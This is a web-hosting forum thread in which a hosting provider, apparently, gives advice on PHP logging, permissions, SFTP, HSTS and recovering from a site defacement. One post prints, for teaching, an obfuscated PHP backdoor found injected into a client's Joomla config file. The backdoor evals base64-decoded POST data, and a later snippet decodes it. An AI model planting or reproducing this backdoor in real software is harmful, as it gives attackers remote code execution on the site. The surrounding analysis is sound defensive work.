|
tj9991 posted:After five months of hosting with Apis Networks I have cancelled and moved to Linode. I do not recommend Apis Networks for anyone planning on using PHP. I handled your issue. The problem was two-fold: first, you designated a separate file to log errors outside the default, which merges Apache and PHP errors into /var/log/httpd/error_log. Ownership of the log file precluded the HTTP server from logging errors. Permissions still had not been changed when I examined your setup further. Second, the error reporting level configured via .htaccess was downgraded, which excluded E_WARNING and E_NOTICE types (9999 or so if memory serves me correctly). Only fatal errors would have been logged even if permissions were corrected. PHP documentation recommends using 2147483647 as your error_reporting value in a .htaccess directive. Odd you had such a speed discrepancy. If you still want to troubleshoot speed issues, send me a PM or e-mail with your IP and a traceroute to 64.22.68.16, which is based in Atlanta. It may be a gross exaggeration, as server loads are minor, around 0.25-0.5 on Helios around the clock. edit: E_NOTICE/E_WARNING nem fucked around with this message at 01:21 on Feb 21, 2013 |
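For reference, the directives above translate into a short .htaccess block like the following - a hedged sketch, assuming PHP runs as mod_php (php_value/php_flag lines are ignored under CGI/FPM), with an illustrative log path:

```apacheconf
# 2147483647 enables every error class (E_ALL) on any PHP version
php_value error_reporting 2147483647
php_flag log_errors on
# Path is a placeholder; the file must be writable by the web server user
php_value error_log /home/example/logs/php_error.log
```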
# ¿ Feb 21, 2013 01:17 |
|
|
LordMaxxie posted:If you have cPanel, I believe you can get a McAfee PCI scan (every 3 months) for free. Couple that with the self-assessment questionnaire and you're right to go. I'd caution against Trustwave, having been on the administrative end of their scanning. Most PCI scanners load up Nessus or another variant with minimal intelligent rulesets to factor in backports from Red Hat Enterprise Linux/CentOS. Trustwave, for example, will scan the major/minor version of OpenSSH and exclude patch levels that are backported from RHEL to amend a CVE. I've had clients escalate verified CVE patches from Red Hat to Trustwave without success. Additionally, I've used SecurityMetrics for PCI scanning that was bundled with FirstData at the time. Very similar results: whitelisting CVEs that could not be physically exploited in the given environment but, based upon the pattern match, were deemed "vulnerable". FirstData cannibalized that partnership and set up Rapid Comply. Six months and two scans in, so far so good. There haven't been any false positives. Unless you know your environment inside-out and have strict policies in place to safeguard credit card data, use a third party to handle credit cards. FirstData provides recurring billing through their system, and they've been fantastic since placing them in a bidding war with Elavon for merchant accounts a couple years back.
|
# ¿ May 21, 2013 04:19 |
|
DarkLotus posted:Serious question... If a hosting provider does not offer phone support, is that a deal breaker for you? Why? I'll opine from the opposite side of the fence: phone is an enormous time sink compared to e-mail. I'll handle 2-3 tasks concurrently ~40% of the time every day. If I have a window open for issues, e-mail is active in the background. If I need to handle a major issue, phone is silent and e-mail is suspended. You can easily interleave multiple tasks while you're waiting on a response from someone or waiting for a task to finish, whereas with phone it's an attentive waiting game for the client to type in a password, then realize only after submitting that a mistake was made in the password, or to pedantically spell out a URL letter by letter. Phone is kept for emergency situations only, but even then if there is an emergency (DoS for example), phone goes on silent and other forms of communication are used to address clients en masse, particularly Twitter. I always enjoy the question of, "well, when do you expect it to get fixed?" to which the only genuine answer is, "the time it would have normally taken plus the time spent on the phone explaining this to you."
|
# ¿ Feb 22, 2014 05:42 |
|
Arboc posted:If addr.com is just your DNS host (and not the registrar) then you probably don't need to transfer the whole domain to a new registrar, and you shouldn't be at risk of losing control of the domain itself. You'll still probably have to find a new host, and you may have to work around issues trying to migrate the individual pieces; I've seen some smaller all-in-one web companies that make things needlessly difficult when you try to take matters into your own hands. Valid point. Can we update the OP to include a list of hosting providers that make routine tasks unnecessarily encumbering? EPP-restrictive registrar transfers, non-existent DNS administration, inaccessible file retrieval, etc. Basically a blacklist of shoddy support to help others steer clear of these situations, because we're here to help others not go down the same path... and over the years a track record is starting to accumulate.
|
# ¿ Jun 3, 2014 06:31 |
|
fletcher posted:I've had a dedicated server through Future Hosting for years in their Chicago DC and it's been great. Up until recently that is, when my download speed will slow to a 32KB/s crawl for hours on end. During the slowness I can speedtest my connection and get 3MB/s. I was also able to download a test file on the server from an AWS machine and it hit 10MB/s. So both me and the server have plenty of bandwidth to spare, is it just my routing that is hosed or something? Too many people around here watching Netflix? Does it happen continuously during set intervals or sporadically? If the former, it's network congestion somewhere along the path between your connection and the data center (most likely near the data center). You could use something like webpagetest.org with a simple page stuffed with data to ascertain download speeds from other places across the globe - or - just do a traceroute (mtr/winmtr) and look for congestion via high pings. If sporadically, it's probably a Broadcom NIC
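If you go the mtr route, congestion shows up as a jump in average latency at one hop that persists through every hop after it. A rough sketch of spotting that programmatically - the report below is fabricated sample data laid out in mtr --report column order (hop, host, Loss%, Snt, Last, Avg, Best, Wrst), not a real trace:

```shell
# Flag hops whose average ping exceeds a threshold in an mtr-style report
report='1 gateway.local 0.0 10 1.2 1.4 1.0 2.1
2 isp-edge.example.net 0.0 10 9.8 10.2 9.1 12.0
3 congested-core.example.net 0.0 10 180.4 175.9 90.2 240.8
4 dc-border.example.net 0.0 10 181.0 177.3 92.5 243.1'

# Print hops with Avg ($6) above 100 ms; flags hops 3 and 4 here
echo "$report" | awk '$6 > 100 { print "high latency at hop " $1 ": " $2 " (" $6 " ms avg)" }'
```

A spike that carries through all downstream hops points at congestion at or near the first hop where it appears; a spike at a single middle hop that vanishes afterward is usually just a router deprioritizing ICMP replies.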
|
# ¿ Jun 27, 2014 03:32 |
|
fletcher posted:It sounded pretty conclusive. I've been able to reproduce the slowness from a completely different location in California now. They asked for the mtr report and I provided it, and they said there's no indication the issue is with something they control. Yes, it's just an mtr from the server to your IP. Dropped ping replies are caused by network policies that throttle or filter echo replies out entirely. There could be QoS implemented somewhere upstream in the network. That would be evident in your reduced bandwidth throughput during peak hours, but not necessarily in ping times.
|
# ¿ Jun 27, 2014 19:30 |
|
cstine posted:During my "career" doing random IT contracting stuff, that was almost EVERYONE I dealt with. I think there's an idiom to express this fallacy... Yes: penny wise and pound foolish. Kiva several years ago hosted their non-profit charity through Dreamhost, and for the first couple months after the goodwill charity exploded, it - to the owners' prudence - seemed practical to remain with Dreamhost, remitting $6/mo in hosting fees while bringing in $10k in charitable contributions. Then growth propelled, and service slowed as Dreamhost amassed more clients onto the server, until a move seemed onerous. Rather than jumping to a dedicated server for $100/mo at the time, the owners decided it salient to complain on the forums about the subpar service. It fell on deaf ears. Decision-makers need to decide what is right. Cutting corners, cutting costs, and zapping a lifeline to your business proves nothing more than your impracticality and reluctance to believe in an idea. I'm not for dropping $300/mo on a concept; in fact, I spent a couple years as a sole proprietorship. I am, however, advocating that people not be stupid in evaluating their future plans. Look at short-term growth. If your growth is climbing, then anticipate a positive trajectory. If your growth has stagnated or, worse, plateaued, then evaluate a graceful departure. Don't flip-flop these strategies by building crap for growth and growth for crap. It takes just a little bit of sensibility, and that's the problem I've seen time and time again within the hosting industry.
|
# ¿ Aug 15, 2014 06:04 |
|
onionradish posted:I just switched a client from a crappily-managed Rackspace reseller account to Bluehost. During the time gap between DNS switchover, some emails went to the old server. I'd like to get access to those emails through webmail or something before we decommission the old servers. Mistrust is justified. Most mail is stored as Maildir, so it's a matter of copying the single-file messages over as-is to the new server. If you have your old IP address handy, edit your hosts file and add an entry pointing mail.hostname.com at the old IP address. You will be able to pull up webmail on your old host. But then again, it's just slovenly mismanagement by your old reseller. They can provide you with the messages should they choose to do so.
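Since Maildir keeps one message per file, the copy really is that mechanical. A throwaway sketch with made-up paths and filenames - over the network you'd swap the cp for rsync -a or scp -rp:

```shell
# Fabricate a tiny Maildir on the "old" server side
mkdir -p old/Maildir/cur old/Maildir/new old/Maildir/tmp
echo "Subject: stranded message" > old/Maildir/new/1412900000.M1P1.oldhost

# The migration itself: copy the tree as-is, preserving modes and times
mkdir -p new
cp -Rp old/Maildir new/

# The stranded message is now in the new account's Maildir
ls new/Maildir/new
```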
|
# ¿ Oct 10, 2014 23:40 |
|
Rufus Ping posted:Paradoxically the most professional and lowest-bullshit registrar I've been with is also one of the cheapest, internet.bs. This may be because both qualities are valued by their original customer base, professional domainers with large portfolios. Never bite the hand that feeds.
|
# ¿ Dec 11, 2014 06:09 |
|
Skywalker OG posted:Looking for some help. My employer's website was defaced. We use Hostgator currently. It seems like they've been compromised because I created a support ticket a week ago and when I called them for an update, they said that they have hundreds of support tickets and I'm rather far back in the queue. They then referred me to a couple of website antivirus / firewall providers. Once defaced, your files aren't secure either, since on those setups every single file (web assets, maybe e-mail) on your account has the same accessibility rights as the file initially defaced. Hackers today will inject code into files that can only be triggered with the right combination of query parameters, so unless you pass along the right GET request, it'll appear safe. Nuke your Cubecart assets or check for files modified within the last week (find from the shell works: find . -mtime -7 -print ). Check anything modified within the last week carefully, looking for arbitrary code that doesn't belong. If it's there, assume your files have been compromised too as a consequence of running everything under a single user. Once your account is defaced, and you run php-fpm or php-cgi under the same user as your account (big box hosters do this for resource accountability), assume all files have an equal chance of being tainted with malicious bootloader code or viewed by a third party. Also, good opportunity to update Cubecart, since there are some vulnerabilities in the wild. Sorry about missing your live chat request earlier. Had to head up to North Atlanta this afternoon for a funeral I had just found out about last night. Edit: thought about this a little more tonight to draw a parallel: consider having 2 keys. One key is a skeleton key that opens every door in your house. Another key opens just the basement stuffed full of junk. An intruder grabs a hold of your basement key - not an issue; you have an understanding it may get broken into eventually.
An intruder grabs a hold of your skeleton key - problem, insofar as he now has access to every room in your house and every valuable good and piece of information. It's the same issue when you run your WordPress/Drupal/Joomla! under the same user as your personal files and other web page assets. When you run your site on Hostgator and EIG's siblings, only one user exists, shared between your web files and your personal files. You have one key and it is a master key. If that's compromised, then you're in a world of hurt, because now they have access to your e-mail, if stored on the same server, your SSH keys, and, depending upon partitioning, likely other domain content. So please be mindful. Hacking isn't a rudimentary point-and-click WinNuke like a decade ago (nor are DoS attacks). With time comes dissemination of knowledge, and hackers too build better tools to carry out more sophisticated, undetectable attacks. I've seen it in post-mortem analyses of hacked accounts that were time and time again victims of outdated software. Whenever there is a breach, there is curiosity too about what else lurks on your site. Had something sensitive nestled among your files? Now you have a big problem on your hands. TLDR: flatten and reinstall if you're unsure of the scope of damage nem fucked around with this message at 05:42 on Jan 16, 2015 |
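A sketch of that triage against a throwaway directory - the injected line is a mock-up of the common eval/base64 pattern, and -mtime -7 matches the one-week window described above:

```shell
# Build a fake docroot: one clean file, one carrying an injected payload
mkdir -p site
echo '<?php echo "hello"; ?>' > site/index.php
echo '<?php eval(base64_decode($_GET["q"])); ?>' > site/cache.php

# PHP files changed in the last 7 days that contain a classic injection marker.
# On a real account you'd review every recent change by hand, not just grep.
find site -type f -mtime -7 -name '*.php' -exec grep -l 'eval(base64_decode' {} +
```

Only site/cache.php is reported; grep is just a first pass, since attackers routinely obfuscate past any single pattern.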
# ¿ Jan 16, 2015 01:12 |
|
Skywalker OG posted:Sucuri is much cheaper at $99 per year, but realistically we would drop them after they have fixed the problem to a satisfactory degree. This is why security relapses occur. If you've proven, up along the managerial chain, unable to keep a site secure, what realistically makes you think this won't happen again? Thalagyrt posted:If you have the capability (you most likely don't on shared hosting) you should set up your web worker as a completely separate user from the user that actually owns your web directory. Doing so would entirely eliminate a lot of the big pain point you're seeing and make a web application firewall mostly unnecessary (it still could save you from some things)... It might be possible with nem's kick-rear end custom panel, but I can't speak to that directly as I don't know much about what he's built over there. Yes, this is the correct approach, and yep, that's what we've done for a long time.
|
# ¿ Jan 16, 2015 22:51 |
|
Skywalker OG posted:We're an extremely small nonprofit organization full of old people with no IT department and historically something bad has had to happen to us in order for our board of directors to care about it enough to act. Vote the least useful director off your board and accommodate a $99/year budgetary increase. Your reputation and reliability are more important and more costly than $8/mo. If your organization has issues accommodating an $8/mo increase, then there is some administrative fat/misconduct within the organization that goes beyond this thread. Sites have four attack vectors, ordered from most to least likely to be exploited: (1) user accounts compromised through unsafe browsing habits and a lack of AV software, (2) the software powering your web site, (3) the server software itself, (4) serendipity. 1 and 2 are interchangeable depending upon how well you keep on top of things. Make it a habit to check the vendor's web site once a month, maybe the first, to see if there's a new version available. Incremental upgrades are always easier than the major upgrade you're forced into in light of getting hacked. Based upon your information, I don't believe HG is exclusively to blame. You might do well with a VPS. You might do well with shared hosting from any recommended brand on the first page. But you might relapse, and continue to do so in perpetuity, until your organization gets its head out of its rear end and takes its accountability more seriously.
|
# ¿ Jan 17, 2015 00:00 |
|
Skywalker OG posted:You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far. Just to give you an idea of the sophistication now, this is a client's configuration file modified by a hacker that I came across today via feedback loop: php:<?php $sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10]. $sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1]. $sF[7].$sF[8].$sF[10]); $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); if (isset(${$s20}['n88b749'])) { eval($s21(${$s20}['n88b749']));}?><?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for ma Typically it's one line, but I had to break it into a few lines to make it play nice with the forums. The only reason this happened is that the file's permissions permit alteration by the web server user (the client got lazy and applied 777 to all files). If the file had permissions 755 and a different owner than that under which the web server runs, then the web server could have read it, but not modified it. With Hostgator and other EIG brands, you lose this added security, because the attack happens under the same user as the rest of your files. Unless you enumerate every file and scan for anomalous changes (like this), then there's no guarantee your frontend software is safe. nem fucked around with this message at 09:51 on Jan 19, 2015 |
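For the curious, the scrambled $sF string decodes by replaying the index arithmetic. A reconstruction in awk (my own, not tooling from the incident):

```shell
# Recover the two identifiers hidden in $sF by replaying the index math.
# awk's substr() is 1-based, hence the +1 on PHP's 0-based offsets.
awk 'BEGIN {
    sF = "PCT4BA6ODSE_"
    split("4 5 9 10 6 3 11 8 10 1 7 8 10", f, " ")   # the $s21 indices
    split("11 0 7 9 2", p, " ")                      # the $s20 indices
    s21 = ""; for (i = 1; i <= 13; i++) s21 = s21 substr(sF, f[i] + 1, 1)
    s20 = ""; for (i = 1; i <= 5; i++)  s20 = s20 substr(sF, p[i] + 1, 1)
    print tolower(s21)   # the function being called
    print toupper(s20)   # the superglobal being read
}'
```

The identifiers come out as base64_decode and _POST, i.e. the injected one-liner boils down to eval(base64_decode($_POST['n88b749'])) - a remote-code-execution backdoor keyed to a single POST parameter.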
# ¿ Jan 19, 2015 01:23 |
|
McGlockenshire posted:Sooooooo, CGI is the problem instead of 0777 permissions? No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM, whatever wrapper you're using that switches users to process a request, is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777; only the damage scope changes (all of your files vs all of someone else's). 777 is bad because members of your group can run amok and modify any of your files. 717 works if you keep one user, with the web server falling into the "other" class, because there are no other members of the group that can touch your assets. Sometimes 717 doesn't work because it's a mixed environment of other users. In those cases, you should run the web server as a separate user and grant write permissions through ACLs to those files which the web server must write/modify, e.g.: code:
code:
It's not perfect, but it's pretty close to being so.
|
# ¿ Jan 20, 2015 16:12 |
|
DarkLotus posted:On a multi-user system, you probably don't want to make something world-writeable if you're already concerned about it being group-writeable. Depends upon setup: as long as every user with access to a particular filesystem slice is part of the group, except for one user, the web user, then 717 works. The 1 would be applied to the group, the 7 to others not matched by the group, per the discretionary access control implementation. It's a dumbed-down version; ACLs or SELinux are better, albeit more intense, options. Once you have another user outside that group with the same filesystem visibility, then 717 fails, and it requires a combination of jailing and application access restrictions to properly implement. \/ - ACLs (setfacl command) and SELinux. The setup works great on a VPS. Not so much for massive hosting companies without the tweaks noted above. nem fucked around with this message at 01:50 on Jan 27, 2015 |
# ¿ Jan 27, 2015 00:38 |
|
eightysixed posted:I've not used WordPress in quite some time, but I remember having to set up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and aren't utilizing sFTP, what's the point? Unless I'm missing something, in which case eightysixed derps all day every day. Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server, and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server unless the server is compromised and a privileged user is capturing local traffic; if so, then you've got bigger issues on your hands with possible rooting. The FTP password in that case will pass over a TCP socket connected locally on the server, bypassing the switch. SFTP requires ssh as a wrapper, so there's a dependency upon the host to support ssh on the account. I hope that in time WordPress will integrate AUTH TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh. If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way not only is your admin password encrypted, but also your FTP credentials. Using FTP, and running a separate web server, creates a permission partition between what you can access and what the web server can. It's the same reason we have UAC in Windows edit: nuances nem fucked around with this message at 19:54 on Jan 27, 2015 |
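For reference, WordPress picks up the updater's FTP settings from constants in wp-config.php; a hedged sketch keeping the transfer on-box, with placeholder credentials:

```php
// wp-config.php - values below are placeholders
define( 'FS_METHOD', 'ftpext' );   // force the FTP-extension transport
define( 'FTP_HOST', 'localhost' ); // same box: credentials stay off the wire
define( 'FTP_USER', 'example_user' );
define( 'FTP_PASS', 'example_pass' );
```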
# ¿ Jan 27, 2015 05:24 |
|
/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges. Thalagyrt posted:SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript. It ships with openssh and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate these two, but going back again to contrived scenarios, I don't think most providers will jump through the hoops to separate ssh and sftp-server. 90% of those layouts will look like: code:
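That stock layout is the one-line Subsystem hook in sshd_config - the binary's path varies by distribution:

```
# /etc/ssh/sshd_config
Subsystem sftp /usr/libexec/openssh/sftp-server   # RHEL/CentOS path
# Subsystem sftp /usr/lib/openssh/sftp-server     # Debian/Ubuntu path
```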
nem fucked around with this message at 18:55 on Jan 27, 2015 |
# ¿ Jan 27, 2015 18:39 |
|
Thalagyrt posted:I was specifically addressing this: need coffee
|
# ¿ Jan 27, 2015 19:23 |
|
Rufus Ping posted:you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting Yes, raw traffic capability is a broader and more suggestive term. The original post has been amended.
|
# ¿ Jan 27, 2015 19:53 |
|
Biowarfare posted:same thing with persisting sessions across http to https: if you land on http, redirect to https for login, your page is ALREADY insecure, and there is no point in doing so. HSTS fixes that, but there are always laggards in adoption (IE, coming in 11). Even a redirect via mod_rewrite to https would leak cookies and other sensitive data in the request if the https request flops back to http. So we're probably, based on IE6 obsolescence, 10+ years from HSTS becoming fully implemented for most web users. Additionally, you can set cookies as secure. If a request goes from https to http and a cookie is marked as secure, it won't get transmitted in the request. The request URI will still leak in that case. edit: coulda/woulda/shoulda nem fucked around with this message at 17:35 on Jan 30, 2015 |
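The two mitigations mentioned, sketched as an Apache fragment (max-age value illustrative; mod_headers must be enabled):

```apacheconf
# Returning browsers refuse plain http for the next six months
Header always set Strict-Transport-Security "max-age=15768000"
```

The secure-cookie side, for PHP sessions, is session.cookie_secure = 1 in php.ini; application-set cookies need the secure flag added wherever they're issued.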
# ¿ Jan 30, 2015 17:28 |
|
cstine posted:TimThumb.php. ... and it still insisted on using the "DOCUMENT_ROOT" server variable when storing thumbs. If you used mod_rewrite to serve content from another location, it ignored WordPress altogether, requiring custom patches.
|
# ¿ Feb 24, 2015 18:33 |
|
BlackMK4 posted:Eh, figured out I don't have to install it. Just use the binary compiled with make. Thanks --prefix=/usr/local is standard practice. Although it depends on your medium: I know for the KB, which is built on WordPress, I've relied on Jetpack, which works well to discriminate bots from humans. Webalizer, Analog, and AWStats (the big free 3) have been rather dormant for some time, ceding ground to bigger commercial players in the market, chiefly Google Analytics and other value-added services that provide bundled analytics. I'd just stick Google Analytics into your site and go from there. You'll get a better resolution of visitor traffic than Webalizer/Analog/AWStats, which provide only baseline traffic, i.e. how many spam bots have pulverized your site in the last 24 hours.
|
# ¿ Mar 20, 2015 06:06 |
|
Oopsie doodle... Press release Edit: better quality discussion of folks still silly enough to use them via WHT nem fucked around with this message at 04:46 on Apr 1, 2015 |
# ¿ Apr 1, 2015 04:07 |
|
Anaxite posted:Except Chrome for Android, which gives the error "NET::ERR_CERT_AUTHORITY_INVALID". Is there a possibility the root certificates installed on that Android are out of date? What Android version is the phone running?
|
# ¿ Jun 14, 2015 16:26 |
|
Anaxite posted:I tested this on Android 4.2.2 and 5.1.1, Chrome versions 43 and 44 beta. The only time I've seen that happen is when the intermediate certificate isn't present in the handshake, i.e. in Apache, SSLCertificateChainFile is missing or supplying an erroneous certificate - you can send as many certificates as necessary; the client will only use those applicable to resolving the chain. At least one path must be sent by the server (i.e. not as an additional download) resolving up to a certificate trusted in its store. That store would be the root certificates in the phone's OS. So either the chain isn't sent, or the CA (Gandi) isn't trusted in the root certificates that ship with both OSes (unlikely).
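On the Apache side that looks like the following - certificate paths are placeholders:

```apacheconf
SSLEngine on
SSLCertificateFile      /etc/ssl/certs/example.com.crt
SSLCertificateKeyFile   /etc/ssl/private/example.com.key
# Intermediate(s) chaining the leaf up to a trusted root; omitting this
# produces exactly the untrusted-authority error described above
SSLCertificateChainFile /etc/ssl/certs/intermediate.pem
```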
|
# ¿ Jun 14, 2015 17:16 |
|
reddit liker posted:
Install etckeeper and push your repo to a private repo on github or another server.
|
# ¿ Aug 31, 2015 16:09 |
|
Biowarfare posted:this is still the personal favourite ive gotten from a hosting provider Just got one from 1and1 regarding some undocumented blacklist heuristics they implement (or a faulty network on their end): quote:Thank you for contacting us. When your hiring manager consists of a pigeon with a keyboard \ Edit: and the cycle continues nem fucked around with this message at 00:38 on Sep 27, 2015 |
# ¿ Sep 26, 2015 23:57 |
|
hayden. posted:I use DigitalOcean. I recently tried to SSH into my server that I hadn't SSH'd into in a long time. The private key I have has definitely not changed, but I get a "Server refused our key" error. Root password doesn't work and I'm not sure there was one originally (just the key). I tried resetting the password using DO's control panel and it didn't work. Trying to login using the console on DO's website has me log in as root, change the password, then immediately kicks me out to login again. Logging in with the new password works for a split second but then kicks me back to login. I have no idea what I configured here. Did you foul up one of the PAM modules? Or did you get hacked, and the hacker, being a douche, added "exit" to your .bash_profile? I'd try booting up into single-user mode, then logging in from whatever tty terminal DO provides.
|
# ¿ Sep 29, 2015 01:56 |
|
hayden. posted:If I had to guess, at some point in time I was following some tutorial that recommended disabling the ability to log in as root. Pass "single" on the kernel line of your boot loader to force single-user mode, if you've got the ability to edit your boot options. I'm not terribly familiar with DO's interface. On Linode at least you can toggle single-user bootup in the VM config. Next time don't follow what someone else has written without comprehending its implications
|
# ¿ Sep 29, 2015 02:51 |
|
Thalagyrt posted:Hell, $5.95/mo is basically the same price as a small VPS, which would give you a lot more control. And a lot more responsibility to keep your machine secure, which often don't go hand-in-hand.
|
# ¿ Nov 13, 2015 18:59 |
|
WordPress will handle minor updates automatically. And there's a plugin to coalesce major updates into this automatic update process.
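If you'd rather skip a plugin, the same switch lives in wp-config.php - WP_AUTO_UPDATE_CORE accepts true (all updates), 'minor' (the default behavior), or false:

```php
// wp-config.php: opt core into major releases as well as minor ones
define( 'WP_AUTO_UPDATE_CORE', true );
```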
|
# ¿ Dec 25, 2015 07:36 |
|
Thalagyrt posted:The catch to that is that you have to give WordPress write access to itself, which is a patently bad idea if you care at all about not getting owned. Would you rather take 1 fist or 2 fists up the rear end? Neither solution is optimal; pick the best of the worst. At least in this setup you can be proactive rather than reactive. More importantly, you have less to think about, which is the OP's goal. Alternatively, a separate user apart from the web server can own the files, with that user's information stored in wp-config.php for automatic FTP updates. Your tradeoff is that FTP login info for this user is stored in wp-config.php, which again can lead to getting owned... Then again, if a hacker has access to one ingress, backdoor installation is so drat trivial.
|
# ¿ Dec 25, 2015 23:22 |
|
Thalagyrt posted:Nah, I'd rather give WordPress no write access other than wp-content/uploads, and explicitly disable PHP execution in wp-content/uploads. Upgrade it manually, either by relaxing permissions temporarily (if you're lazy) or ideally by pushing out an entirely new codebase as a new atomic release using something like capistrano + git, symlinking content directories in from a common shared folder. The benefit of that, of course, being that your git repo instead of web server is authoritative for what code belongs on your web server. A hole elsewhere in its codebase will still allow arbitrary execution regardless of whether uploads/ or themes/ are satisfactorily locked down. You might halt its spread, but compromised accounts or a newfound spam relay are just as obnoxious as a security relapse. The only practical solution is vigilance. Always be on top of updates. You can make the exposed surface smaller, but a hole is a hole and in 13 years I can only attest to one thing: end-users are a mixed bag of ability. Never assume too much.
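The capistrano-style layout from the quote reduces to a symlink flip; a bare-bones sketch with mock release directories:

```shell
# Two immutable releases plus a shared dir for writable content
mkdir -p releases/20160101 releases/20160201 shared/uploads
echo "v1" > releases/20160101/index.php
echo "v2" > releases/20160201/index.php

# Each release links the shared, writable content dir into place
ln -sfn ../../shared/uploads releases/20160201/uploads

# Deploy = atomically repoint "current"; rollback = point it back
ln -sfn releases/20160201 current
cat current/index.php
```

The web server's docroot points at current/; code directories stay read-only to the web user, and a bad release rolls back by flipping one symlink.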
|
# ¿ Dec 26, 2015 00:30 |
|
Bob Morales posted:How many big ugly security breaches is that for them? Ugh. It hit Zayo's data center in Atlanta. We were affected, as was the entire data center, including its in-house brand NetDepot. The attackers hit the edge router instead of the actual machine they wanted to knock offline. Around 2 hours of intermittent downtime on New Year's Day. Sometimes you feel bad for the network engineers who mitigate these onslaughts.
|
# ¿ Jan 5, 2016 21:22 |
|
/\ - What he said. Got caught up in a ticket Thalagyrt posted:That's not propagation - that's cache expiration. The two are very different concepts. Propagation implies that the source is pushing data to consumers, whereas the reality is that the consumers are pulling data from the source upon request and caching it. That's senseless pedantry. When we refer to propagation typically we're not talking about replication among slaves. We're referring to cache expirations from local resolvers and at what point 95% of resolvers will pull the new records. Some upstream resolvers do violate prescribed TTLs, but for the most part propagation = cache, because propagation among slaves is drat near instantaneous.
|
# ¿ May 10, 2016 01:01 |
|
Biowarfare posted:http://bounceweb.com/ajax-hosting.html Last time BounceWeb was around this block, the thread turned into a shitstorm because their policies forbade ffmpeg... and sure enough, the article on ffmpeg hosting is still there. Oh well, let's see how many suckers that page can ensnare.
|
# ¿ Jun 3, 2016 01:34 |
|
RAID0 These guys haven't had any serious disasters in the 30 days since rolling it out, or they use 2-disk setups.
|
# ¿ Jul 6, 2016 19:18 |
|
MrMoo posted:RAID 0 on SSD is an improvement from mechanical drives, from the underlying storage perspective it is reasonable as there is already error recovery in place, you are only beholden to the controller flaking out which is likely for any other chip in the data path too. Having no mechanical parts will certainly improve its reliability, but electronics fail. I've had everything on PowerEdge servers, from power supplies to LCD bezels, die over 14 years. Intel recorded its AFR at 0.61% for SSDs versus 4.85% for mechanical drives; of course that was 2011, and technology has only improved. Failure, however, remains an ongoing concern. Rolling out machines with 8+ devices in RAID0 greatly amplifies that initial 0.61% risk of one unit failing. Whether SMART catches it, and whether they act on it (or have the parts on site to do so), depends upon their competency. Something tells me at that price point competency isn't their strong suit.
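To put a number on "greatly amplifies": treating drive failures as independent, a stripe is lost when any one member fails, so an eight-drive RAID0 at Intel's quoted 0.61% AFR sees roughly:

```latex
P(\text{array loss}) = 1 - (1 - 0.0061)^{8} \approx 1 - 0.952 \approx 4.8\%
```

That lands back in mechanical-drive territory, with none of the redundancy.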
|
# ¿ Jul 7, 2016 20:21 |
|
UGAmazing posted:
Any particular reason you want to gravitate towards a big-box host that reduces your account to ink on a 10-K filing? Those are all very reasonable requests that DarkLotus (Lithium) and I pride ourselves on providing for clients.
|
# ¿ Aug 18, 2016 17:14 |
|
|
nictuku posted:I'm creating a database-as-a-service infrastructure, so providers can sell managed MongoDB, MySQL, Redis, etc to their customers. quote:My job is to deploy clustered database and then maintain, backup, monitor, make everything fault-tolerant and auto-scaled. If the database breaks, I'm the one to fix it. Since my cost to run a 1GB RAM server is the same as running a 128GB server, I'd charge a flat fee per server. The fee would be low enough to make this super attractive to hosting providers. quote:The hosting provider would be responsible for 1) servers, network, etc; 2) customer acquisition; 3) customer support. quote:Since these are things that hosting providers are already very good at, I see this a win-win for everyone. Customers get managed services from providers they like; providers get new revenue with little extra operational overhead and; I get my fair share too! Providers can either get new customers, or upsell their existing ones. quote:I see a bunch of managed MongoDB companies popping up, including one acquired by IBM (compose.io), so there's gotta be a market for this, right? I could see this being a complementary service to something like ServerPilot - about which I hold my own reservations as to actual efficacy - for wannabe sysadmins who purchase VPSes and have no earthly clue what they are doing. Throw in a simple monitoring dashboard that works with all of the NoSQL/RDBMS offerings out there, attach a $0 price tag, and charge on support (charge hand over fist, might I add!) and you have a product that could be received very warmly by IaaS providers like Linode, DO, and Vultr. Edit: For the premium version add: easy clustering and replication. For the free version: background optimization like what ktune/tuned does, e.g. mysqltuner.pl. Database loads adjust over time. Having something constantly working in the background, monitoring, making inferences, and then tuning to squeeze maximum performance out would be a killer feature.
If you were to make an easy sell, that's the feature that would arouse my interest. nem fucked around with this message at 05:34 on Aug 19, 2016 |
# ¿ Aug 19, 2016 05:11 |